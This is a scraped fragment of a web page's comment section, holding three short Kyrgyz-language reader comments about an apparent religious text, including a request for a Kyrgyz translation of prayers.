r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

Share

You may also like...

3 комментария

 1. Баяман:

  25 тушуно албай койдум

 2. Абдулла:

  Саламатсызбы. Мага намаздын кыргызча котормосун жонотосузбу. Салаваттын Жана аттахияттын Жана руку сажда дуаларынын.

  elmanstroy@gmail.com

  Рахмат

 3. Назира:

  Мен абдан дакшы тушундум размат

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *